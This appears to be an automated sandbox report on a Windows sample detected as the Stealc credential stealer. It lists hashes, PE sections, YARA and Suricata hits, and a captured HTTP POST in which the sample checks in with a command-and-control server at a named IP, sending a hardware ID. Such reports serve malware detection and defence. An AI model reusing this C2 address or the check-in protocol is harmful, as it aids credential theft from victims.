                http://185.215.113.37/e2b1563c6670f193.phpS | file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpi | file.exe, 00000000.00000002.2067248972.0000000001463000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpG | file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpw | file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1538461
                Start date and time: 2024-10-21 10:46:06 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 2m 47s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 2
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 90
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                          No context
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                          WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse
                          • 185.215.113.37
                            | file.exe | Get hash | malicious | Stealc, Vidar | Browse
                          • 185.215.113.37
                            | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
                          • 185.215.113.16
                            | file.exe | Get hash | malicious | Stealc | Browse
                          • 185.215.113.37
                            | file.exe | Get hash | malicious | Stealc, Vidar | Browse
                          • 185.215.113.37
                            | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
                          • 185.215.113.16
                            | file.exe | Get hash | malicious | Stealc | Browse
                          • 185.215.113.37
                            | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
                          • 185.215.113.16
                            | file.exe | Get hash | malicious | Stealc | Browse
                          • 185.215.113.37
                            | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
                          • 185.215.113.16
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.948934641977069
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'887'232 bytes
                          MD5:6535a50286893f791f119217511acc32
                          SHA1:2155f365670366e0839d7231944930ddf60ea32b
                          SHA256:42944bc940b4e9c0dd2a3f97ab9090005213870edeb8e26fec953afa12140ef2
                          SHA512:ade89712a86c5150d2f4064fed0a31a12b7a0658bc4c6846baa3f4d3ea2d5a3d4178fd58a1caa46a3490226a2352b84c6822f661cfb2f0e62dd32d00156b305a
                          SSDEEP:49152:jpf6Hy/8xXSiXmun5tuQSzbyWANjGij9phd:jpfmI6JXmun5tmzbNKKqh
                          TLSH:6B95337CFFEB6337C576A5FEC286D881261932420254080B05E952926F1BD5F32FAEE4
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xab3000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007F242902F79Ah
                          rsm
                          sbb al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007F2429031795h
                          add byte ptr [ebx], cl
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+00h], ah
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          (unnamed) | 0x1000 | 0x25b000 | 0x22800 | a64bf421faf1d1924280ebc445bceb79 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          (unnamed) | 0x25e000 | 0x2ad000 | 0x200 | eb906f8f54535840d6ebae5c7015d0a7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          yuntpzro | 0x50b000 | 0x1a7000 | 0x1a6a00 | f9bfc4d82ec0699f87cbd1077f6e99aa | False | 0.9950741505841467 | data | 7.954094538527286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          dfroebje | 0x6b2000 | 0x1000 | 0x400 | cd28ddd9dae1f1c0da7b5b4cc67b7e84 | False | 0.75 | data | 5.903651763239205 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant | 0x6b3000 | 0x3000 | 0x2200 | f593cbcc2c3568caff2c7d32749a3842 | False | 0.06744025735294118 | DOS executable (COM) | 0.7194368073742458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          DLL | Import
                          kernel32.dll | lstrcpy
                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                          2024-10-21T10:46:59.150628+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 21, 2024 10:46:57.961961031 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                          Oct 21, 2024 10:46:57.966861010 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                          Oct 21, 2024 10:46:57.966948032 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                          Oct 21, 2024 10:46:57.967072010 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                          Oct 21, 2024 10:46:57.971836090 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                          Oct 21, 2024 10:46:58.861968994 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                          Oct 21, 2024 10:46:58.862103939 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                          Oct 21, 2024 10:46:58.866256952 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                          Oct 21, 2024 10:46:58.871134996 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                          Oct 21, 2024 10:46:59.150542974 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                          Oct 21, 2024 10:46:59.150628090 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                          Oct 21, 2024 10:47:01.679208040 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                          • 185.215.113.37
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 616 | C:\Users\user\Desktop\file.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 21, 2024 10:46:57.967072010 CEST | 89 | OUT | GET / HTTP/1.1
                          Host: 185.215.113.37
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 21, 2024 10:46:58.861968994 CEST | 203 | IN | HTTP/1.1 200 OK
                          Date: Mon, 21 Oct 2024 08:46:58 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 21, 2024 10:46:58.866256952 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
                          Host: 185.215.113.37
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 44 38 42 37 41 45 33 39 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a
                          Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="hwid"32D8B7AE39294266498721------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build"doma------GHJKECAAAFHJECAAAEBF--
                          Oct 21, 2024 10:46:59.150542974 CEST | 210 | IN | HTTP/1.1 200 OK
                          Date: Mon, 21 Oct 2024 08:46:59 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=
                          Target ID:0
                          Start time:04:46:54
                          Start date:21/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x5f0000
                          File size:1'887'232 bytes
                          MD5 hash:6535A50286893F791F119217511ACC32
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:7.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
API calls 14016->14017 14018 5f35d7 14017->14018 14019 5f45c0 2 API calls 14018->14019 14020 5f35f0 14019->14020 14021 5f45c0 2 API calls 14020->14021 14022 5f3609 14021->14022 14023 5f45c0 2 API calls 14022->14023 14024 5f3622 14023->14024 14025 5f45c0 2 API calls 14024->14025 14026 5f363b 14025->14026 14027 5f45c0 2 API calls 14026->14027 14028 5f3654 14027->14028 14029 5f45c0 2 API calls 14028->14029 14030 5f366d 14029->14030 14031 5f45c0 2 API calls 14030->14031 14032 5f3686 14031->14032 14033 5f45c0 2 API calls 14032->14033 14034 5f369f 14033->14034 14035 5f45c0 2 API calls 14034->14035 14036 5f36b8 14035->14036 14037 5f45c0 2 API calls 14036->14037 14038 5f36d1 14037->14038 14039 5f45c0 2 API calls 14038->14039 14040 5f36ea 14039->14040 14041 5f45c0 2 API calls 14040->14041 14042 5f3703 14041->14042 14043 5f45c0 2 API calls 14042->14043 14044 5f371c 14043->14044 14045 5f45c0 2 API calls 14044->14045 14046 5f3735 14045->14046 14047 5f45c0 2 API calls 14046->14047 14048 5f374e 14047->14048 14049 5f45c0 2 API calls 14048->14049 14050 5f3767 14049->14050 14051 5f45c0 2 API calls 14050->14051 14052 5f3780 14051->14052 14053 5f45c0 2 API calls 14052->14053 14054 5f3799 14053->14054 14055 5f45c0 2 API calls 14054->14055 14056 5f37b2 14055->14056 14057 5f45c0 2 API calls 14056->14057 14058 5f37cb 14057->14058 14059 5f45c0 2 API calls 14058->14059 14060 5f37e4 14059->14060 14061 5f45c0 2 API calls 14060->14061 14062 5f37fd 14061->14062 14063 5f45c0 2 API calls 14062->14063 14064 5f3816 14063->14064 14065 5f45c0 2 API calls 14064->14065 14066 5f382f 14065->14066 14067 5f45c0 2 API calls 14066->14067 14068 5f3848 14067->14068 14069 5f45c0 2 API calls 14068->14069 14070 5f3861 14069->14070 14071 5f45c0 2 API calls 14070->14071 14072 5f387a 14071->14072 14073 5f45c0 2 API calls 14072->14073 14074 5f3893 14073->14074 14075 5f45c0 2 API calls 14074->14075 14076 5f38ac 14075->14076 14077 5f45c0 2 API calls 14076->14077 14078 5f38c5 14077->14078 14079 5f45c0 2 API calls 
14078->14079 14080 5f38de 14079->14080 14081 5f45c0 2 API calls 14080->14081 14082 5f38f7 14081->14082 14083 5f45c0 2 API calls 14082->14083 14084 5f3910 14083->14084 14085 5f45c0 2 API calls 14084->14085 14086 5f3929 14085->14086 14087 5f45c0 2 API calls 14086->14087 14088 5f3942 14087->14088 14089 5f45c0 2 API calls 14088->14089 14090 5f395b 14089->14090 14091 5f45c0 2 API calls 14090->14091 14092 5f3974 14091->14092 14093 5f45c0 2 API calls 14092->14093 14094 5f398d 14093->14094 14095 5f45c0 2 API calls 14094->14095 14096 5f39a6 14095->14096 14097 5f45c0 2 API calls 14096->14097 14098 5f39bf 14097->14098 14099 5f45c0 2 API calls 14098->14099 14100 5f39d8 14099->14100 14101 5f45c0 2 API calls 14100->14101 14102 5f39f1 14101->14102 14103 5f45c0 2 API calls 14102->14103 14104 5f3a0a 14103->14104 14105 5f45c0 2 API calls 14104->14105 14106 5f3a23 14105->14106 14107 5f45c0 2 API calls 14106->14107 14108 5f3a3c 14107->14108 14109 5f45c0 2 API calls 14108->14109 14110 5f3a55 14109->14110 14111 5f45c0 2 API calls 14110->14111 14112 5f3a6e 14111->14112 14113 5f45c0 2 API calls 14112->14113 14114 5f3a87 14113->14114 14115 5f45c0 2 API calls 14114->14115 14116 5f3aa0 14115->14116 14117 5f45c0 2 API calls 14116->14117 14118 5f3ab9 14117->14118 14119 5f45c0 2 API calls 14118->14119 14120 5f3ad2 14119->14120 14121 5f45c0 2 API calls 14120->14121 14122 5f3aeb 14121->14122 14123 5f45c0 2 API calls 14122->14123 14124 5f3b04 14123->14124 14125 5f45c0 2 API calls 14124->14125 14126 5f3b1d 14125->14126 14127 5f45c0 2 API calls 14126->14127 14128 5f3b36 14127->14128 14129 5f45c0 2 API calls 14128->14129 14130 5f3b4f 14129->14130 14131 5f45c0 2 API calls 14130->14131 14132 5f3b68 14131->14132 14133 5f45c0 2 API calls 14132->14133 14134 5f3b81 14133->14134 14135 5f45c0 2 API calls 14134->14135 14136 5f3b9a 14135->14136 14137 5f45c0 2 API calls 14136->14137 14138 5f3bb3 14137->14138 14139 5f45c0 2 API calls 14138->14139 14140 5f3bcc 14139->14140 14141 5f45c0 2 API calls 14140->14141 
14142 5f3be5 14141->14142 14143 5f45c0 2 API calls 14142->14143 14144 5f3bfe 14143->14144 14145 5f45c0 2 API calls 14144->14145 14146 5f3c17 14145->14146 14147 5f45c0 2 API calls 14146->14147 14148 5f3c30 14147->14148 14149 5f45c0 2 API calls 14148->14149 14150 5f3c49 14149->14150 14151 5f45c0 2 API calls 14150->14151 14152 5f3c62 14151->14152 14153 5f45c0 2 API calls 14152->14153 14154 5f3c7b 14153->14154 14155 5f45c0 2 API calls 14154->14155 14156 5f3c94 14155->14156 14157 5f45c0 2 API calls 14156->14157 14158 5f3cad 14157->14158 14159 5f45c0 2 API calls 14158->14159 14160 5f3cc6 14159->14160 14161 5f45c0 2 API calls 14160->14161 14162 5f3cdf 14161->14162 14163 5f45c0 2 API calls 14162->14163 14164 5f3cf8 14163->14164 14165 5f45c0 2 API calls 14164->14165 14166 5f3d11 14165->14166 14167 5f45c0 2 API calls 14166->14167 14168 5f3d2a 14167->14168 14169 5f45c0 2 API calls 14168->14169 14170 5f3d43 14169->14170 14171 5f45c0 2 API calls 14170->14171 14172 5f3d5c 14171->14172 14173 5f45c0 2 API calls 14172->14173 14174 5f3d75 14173->14174 14175 5f45c0 2 API calls 14174->14175 14176 5f3d8e 14175->14176 14177 5f45c0 2 API calls 14176->14177 14178 5f3da7 14177->14178 14179 5f45c0 2 API calls 14178->14179 14180 5f3dc0 14179->14180 14181 5f45c0 2 API calls 14180->14181 14182 5f3dd9 14181->14182 14183 5f45c0 2 API calls 14182->14183 14184 5f3df2 14183->14184 14185 5f45c0 2 API calls 14184->14185 14186 5f3e0b 14185->14186 14187 5f45c0 2 API calls 14186->14187 14188 5f3e24 14187->14188 14189 5f45c0 2 API calls 14188->14189 14190 5f3e3d 14189->14190 14191 5f45c0 2 API calls 14190->14191 14192 5f3e56 14191->14192 14193 5f45c0 2 API calls 14192->14193 14194 5f3e6f 14193->14194 14195 5f45c0 2 API calls 14194->14195 14196 5f3e88 14195->14196 14197 5f45c0 2 API calls 14196->14197 14198 5f3ea1 14197->14198 14199 5f45c0 2 API calls 14198->14199 14200 5f3eba 14199->14200 14201 5f45c0 2 API calls 14200->14201 14202 5f3ed3 14201->14202 14203 5f45c0 2 API calls 14202->14203 14204 5f3eec 
14203->14204 14205 5f45c0 2 API calls 14204->14205 14206 5f3f05 14205->14206 14207 5f45c0 2 API calls 14206->14207 14208 5f3f1e 14207->14208 14209 5f45c0 2 API calls 14208->14209 14210 5f3f37 14209->14210 14211 5f45c0 2 API calls 14210->14211 14212 5f3f50 14211->14212 14213 5f45c0 2 API calls 14212->14213 14214 5f3f69 14213->14214 14215 5f45c0 2 API calls 14214->14215 14216 5f3f82 14215->14216 14217 5f45c0 2 API calls 14216->14217 14218 5f3f9b 14217->14218 14219 5f45c0 2 API calls 14218->14219 14220 5f3fb4 14219->14220 14221 5f45c0 2 API calls 14220->14221 14222 5f3fcd 14221->14222 14223 5f45c0 2 API calls 14222->14223 14224 5f3fe6 14223->14224 14225 5f45c0 2 API calls 14224->14225 14226 5f3fff 14225->14226 14227 5f45c0 2 API calls 14226->14227 14228 5f4018 14227->14228 14229 5f45c0 2 API calls 14228->14229 14230 5f4031 14229->14230 14231 5f45c0 2 API calls 14230->14231 14232 5f404a 14231->14232 14233 5f45c0 2 API calls 14232->14233 14234 5f4063 14233->14234 14235 5f45c0 2 API calls 14234->14235 14236 5f407c 14235->14236 14237 5f45c0 2 API calls 14236->14237 14238 5f4095 14237->14238 14239 5f45c0 2 API calls 14238->14239 14240 5f40ae 14239->14240 14241 5f45c0 2 API calls 14240->14241 14242 5f40c7 14241->14242 14243 5f45c0 2 API calls 14242->14243 14244 5f40e0 14243->14244 14245 5f45c0 2 API calls 14244->14245 14246 5f40f9 14245->14246 14247 5f45c0 2 API calls 14246->14247 14248 5f4112 14247->14248 14249 5f45c0 2 API calls 14248->14249 14250 5f412b 14249->14250 14251 5f45c0 2 API calls 14250->14251 14252 5f4144 14251->14252 14253 5f45c0 2 API calls 14252->14253 14254 5f415d 14253->14254 14255 5f45c0 2 API calls 14254->14255 14256 5f4176 14255->14256 14257 5f45c0 2 API calls 14256->14257 14258 5f418f 14257->14258 14259 5f45c0 2 API calls 14258->14259 14260 5f41a8 14259->14260 14261 5f45c0 2 API calls 14260->14261 14262 5f41c1 14261->14262 14263 5f45c0 2 API calls 14262->14263 14264 5f41da 14263->14264 14265 5f45c0 2 API calls 14264->14265 14266 5f41f3 14265->14266 
14267 5f45c0 2 API calls 14266->14267 14268 5f420c 14267->14268 14269 5f45c0 2 API calls 14268->14269 14270 5f4225 14269->14270 14271 5f45c0 2 API calls 14270->14271 14272 5f423e 14271->14272 14273 5f45c0 2 API calls 14272->14273 14274 5f4257 14273->14274 14275 5f45c0 2 API calls 14274->14275 14276 5f4270 14275->14276 14277 5f45c0 2 API calls 14276->14277 14278 5f4289 14277->14278 14279 5f45c0 2 API calls 14278->14279 14280 5f42a2 14279->14280 14281 5f45c0 2 API calls 14280->14281 14282 5f42bb 14281->14282 14283 5f45c0 2 API calls 14282->14283 14284 5f42d4 14283->14284 14285 5f45c0 2 API calls 14284->14285 14286 5f42ed 14285->14286 14287 5f45c0 2 API calls 14286->14287 14288 5f4306 14287->14288 14289 5f45c0 2 API calls 14288->14289 14290 5f431f 14289->14290 14291 5f45c0 2 API calls 14290->14291 14292 5f4338 14291->14292 14293 5f45c0 2 API calls 14292->14293 14294 5f4351 14293->14294 14295 5f45c0 2 API calls 14294->14295 14296 5f436a 14295->14296 14297 5f45c0 2 API calls 14296->14297 14298 5f4383 14297->14298 14299 5f45c0 2 API calls 14298->14299 14300 5f439c 14299->14300 14301 5f45c0 2 API calls 14300->14301 14302 5f43b5 14301->14302 14303 5f45c0 2 API calls 14302->14303 14304 5f43ce 14303->14304 14305 5f45c0 2 API calls 14304->14305 14306 5f43e7 14305->14306 14307 5f45c0 2 API calls 14306->14307 14308 5f4400 14307->14308 14309 5f45c0 2 API calls 14308->14309 14310 5f4419 14309->14310 14311 5f45c0 2 API calls 14310->14311 14312 5f4432 14311->14312 14313 5f45c0 2 API calls 14312->14313 14314 5f444b 14313->14314 14315 5f45c0 2 API calls 14314->14315 14316 5f4464 14315->14316 14317 5f45c0 2 API calls 14316->14317 14318 5f447d 14317->14318 14319 5f45c0 2 API calls 14318->14319 14320 5f4496 14319->14320 14321 5f45c0 2 API calls 14320->14321 14322 5f44af 14321->14322 14323 5f45c0 2 API calls 14322->14323 14324 5f44c8 14323->14324 14325 5f45c0 2 API calls 14324->14325 14326 5f44e1 14325->14326 14327 5f45c0 2 API calls 14326->14327 14328 5f44fa 14327->14328 14329 5f45c0 2 
API calls 14328->14329 14330 5f4513 14329->14330 14331 5f45c0 2 API calls 14330->14331 14332 5f452c 14331->14332 14333 5f45c0 2 API calls 14332->14333 14334 5f4545 14333->14334 14335 5f45c0 2 API calls 14334->14335 14336 5f455e 14335->14336 14337 5f45c0 2 API calls 14336->14337 14338 5f4577 14337->14338 14339 5f45c0 2 API calls 14338->14339 14340 5f4590 14339->14340 14341 5f45c0 2 API calls 14340->14341 14342 5f45a9 14341->14342 14343 609c10 14342->14343 14344 609c20 43 API calls 14343->14344 14345 60a036 8 API calls 14343->14345 14344->14345 14346 60a146 14345->14346 14347 60a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14345->14347 14348 60a153 8 API calls 14346->14348 14349 60a216 14346->14349 14347->14346 14348->14349 14350 60a298 14349->14350 14351 60a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14349->14351 14352 60a2a5 6 API calls 14350->14352 14353 60a337 14350->14353 14351->14350 14352->14353 14354 60a344 9 API calls 14353->14354 14355 60a41f 14353->14355 14354->14355 14356 60a4a2 14355->14356 14357 60a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14355->14357 14358 60a4ab GetProcAddress GetProcAddress 14356->14358 14359 60a4dc 14356->14359 14357->14356 14358->14359 14360 60a515 14359->14360 14361 60a4e5 GetProcAddress GetProcAddress 14359->14361 14362 60a612 14360->14362 14363 60a522 10 API calls 14360->14363 14361->14360 14364 60a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14362->14364 14365 60a67d 14362->14365 14363->14362 14364->14365 14366 60a686 GetProcAddress 14365->14366 14367 60a69e 14365->14367 14366->14367 14368 60a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14367->14368 14369 605ca3 14367->14369 14368->14369 14370 5f1590 14369->14370 15491 5f1670 14370->15491 14373 60a7a0 lstrcpy 14374 5f15b5 14373->14374 14375 60a7a0 lstrcpy 14374->14375 14376 5f15c7 14375->14376 14377 60a7a0 lstrcpy 14376->14377 14378 
